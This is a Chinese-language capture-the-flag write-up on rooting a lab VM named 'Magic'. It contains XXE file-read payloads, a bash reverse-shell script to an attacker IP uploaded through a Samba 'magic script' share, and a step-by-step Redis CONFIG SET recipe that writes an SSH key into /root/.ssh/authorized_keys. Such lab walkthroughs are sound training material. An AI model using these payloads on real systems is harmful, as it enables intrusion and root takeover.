Magic

靶机说明

QQ群：660930334

一、主机探测

┌──(root㉿kali)-[/miao/maze-sec/magic]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-22 21:08 CST
Nmap scan report for 192.168.2.1
Host is up (0.00019s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00025s latency).
MAC Address: 08:00:27:C5:9D:B8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.61
Host is up (0.0012s latency).
MAC Address: 08:00:27:43:16:2D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.02 seconds

靶机IP：192.168.2.61

二、端口扫描

1、全端口扫描

┌──(root㉿kali)-[/miao/maze-sec/magic]
└─# nmap --min-rate 10000 -p- 192.168.2.61                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-22 21:09 CST
Nmap scan report for 192.168.2.61
Host is up (0.00041s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:43:16:2D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.48 seconds

开放端口：22,80,139,445

2、详细信息扫描

┌──(root㉿kali)-[/miao/maze-sec/magic]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,139,445 192.168.2.61
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-22 21:09 CST
Nmap scan report for 192.168.2.61
Host is up (0.00073s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp  open  http        Apache httpd 2.4.62 ((Debian))
|_http-title: XML Processor
|_http-server-header: Apache/2.4.62 (Debian)
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:43:16:2D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2025-07-22T13:09:49
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -1s
|_nbstat: NetBIOS name: MAGIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds

3、UDP端口扫描

┌──(root㉿kali)-[/miao/maze-sec/magic]
└─# nmap -sU --top-ports 100 192.168.2.61                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-22 21:10 CST
Nmap scan report for 192.168.2.61
Host is up (0.00056s latency).
Not shown: 57 closed udp ports (port-unreach), 42 open|filtered udp ports (no-response)
PORT    STATE SERVICE
137/udp open  netbios-ns
MAC Address: 08:00:27:43:16:2D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 53.02 seconds

开放端口137，服务netbios-ns

三、WEB渗透

访问80端口，是一个XML Processing Service

XXE注入

尝试发现可以执行xml，尝试读取文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
    <!ENTITY example SYSTEM "file:///etc/passwd">
]>
<data>
    &example;
</data>

读取文件/etc/passwd，并得到当前用户为tuf

四、获取SHELL

SMB服务

SMB服务开启着，使用XXE读取配置文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
    <!ENTITY example SYSTEM "file:///etc/samba/smb.conf">
]>
<data>
    &example;
</data>

SMB配置文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY example SYSTEM "file:///etc/samba/smb.conf">
]>
<data>
    [global]
   workgroup = WORKGROUP
   server string = Samba Server
   security = user
   map to guest = Bad User

[magic_upload]
   path = /srv/samba/upload
   writable = yes
   guest ok = yes
   guest only = yes
   force create mode = 0777
   force directory mode = 0777
   magic script = dashazi.sh  

</data>

发现magic_uplaod可以匿名共享，同时在上传文件时dashazi.sh脚本会自动执行

直接进行上传，同时开启监听

┌──(root㉿kali)-[/miao/maze-sec/magic]
└─# cat dashazi.sh 
#!/bin/bash
bash -i >& /dev/tcp/192.168.2.4/4444 0>&1

┌──(root㉿kali)-[/miao/maze-sec/magic]
└─# smbclient //192.168.2.61/magic_upload -N 
Try "help" to get a list of possible commands.
smb: \> put dashazi.sh

获取shell

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.61] 38766
bash: cannot set terminal process group (448): Inappropriate ioctl for device
bash: no job control in this shell
nobody@Magic:/srv/samba/upload$ id
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@Magic:/srv/samba/upload$ 

USER FLAG

nobody@Magic:/home/tuf$ cat user.txt
flag{user-5c9597f3c8245907ea71a89d9d39d08e}

五、权限提升

查看以root权限运行的进程

nobody@Magic:/home/tuf$ ps aux | grep root
ps aux | grep root
.....
/usr/bin/redis-server 127.0.0.1:6379
root         371  0.0  0.1 222784  4060 ?        Ssl  09:07   0:00 
.....

发现开放着redis服务，并且以root权限运行着

1、redis写入公钥提权

进入redis服务

nobody@Magic:/srv/samba/upload$ redis-cli
127.0.0.1:6379>
127.0.0.1:6379> config set dir /root/.ssh/
OK
127.0.0.1:6379> config set dbfilename "authorized_keys"
OK
127.0.0.1:6379> set mykey "\n\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBj5fESTr1FJVwvX47OzCUmh3LjoPZuwmGxeXO4RiaHD root@kali\n\n"
OK
127.0.0.1:6379> save
OK

2、提至root权限

直接登录即可

┌──(root㉿kali)-[/miao/maze-sec/magic]
└─# ssh root@192.168.2.61         
Linux Magic 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jul 12 22:40:51 2025 from 192.168.3.94
root@Magic:~# id
uid=0(root) gid=0(root) groups=0(root)

ROOT FALG

root@Magic:~# cat root.txt 
flag{root-43777257653cd6cbacd6ff02ccfc1bc0}

【总结】

1、SMB服务

smb服务的配置文件/etc/samba/smb.conf

2、redis写公钥步骤

1. 生成公钥

   ┌──(root㉿kali)-[/miao/maze-sec/magic]
   └─# ssh-keygen                  
   Generating public/private ed25519 key pair.
   Enter file in which to save the key (/root/.ssh/id_ed25519): 
   Enter passphrase (empty for no passphrase): 
   Enter same passphrase again: 
   Your identification has been saved in /root/.ssh/id_ed25519
   Your public key has been saved in /root/.ssh/id_ed25519.pub
   The key fingerprint is:
   SHA256:AFGEtZU0X1T1y0a43Mbh4R7KAQhhISyludMZsXOQpeY root@kali
   The key's randomart image is:
   +--[ED25519 256]--+
   |    =@*B*. .o....|
   |   .++Booo..  . .|
   |   o.*o. ... . +.|
   |    = =.    o O +|
   |   o E  S    + @ |
   |    .       . * .|
   |             o . |
   |                 |
   |                 |
   +----[SHA256]-----+

2. 将公钥保存到1.txt

   ┌──(root㉿kali)-[/miao/maze-sec/magic]
   └─# cat /root/.ssh/id_ed25519.pub >> 1.txt
   
   ┌──(root㉿kali)-[/miao/maze-sec/magic]
   └─# cat 1.txt                             
   ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBj5fESTr1FJVwvX47OzCUmh3LjoPZuwmGxeXO4RiaHD root@kali

3. 链接目标服务器上的Redis服务，将保存的公钥1.txt写入Redis

   cat 1.txt | redis-cli -h 10.10.10.135 -x set crack

4. 通过客户端远程登陆目标靶机的Redis服务，并使用CONFIG GET dir命令得到Redis备份的路径

   redis-cli -h 靶机IP
   CONFIG GET dir

5. 更改Redis备份路径为ssh公钥存放目录（一般默认为/root/.ssh）

   config set dir /root/.ssh

6. 设置上传公钥的备份文件名字为authorized_keys

   config set dbfilename "authorized_keys"

7. 检查是否更改成功（查看有没有authorized_keys文件），没有问题就保存然后退出

   CONFIG GET dbfilename
   save
   exit

8. 在攻击机上使用SSH免密登录靶机

   ssh root@xxxx -i id_rsa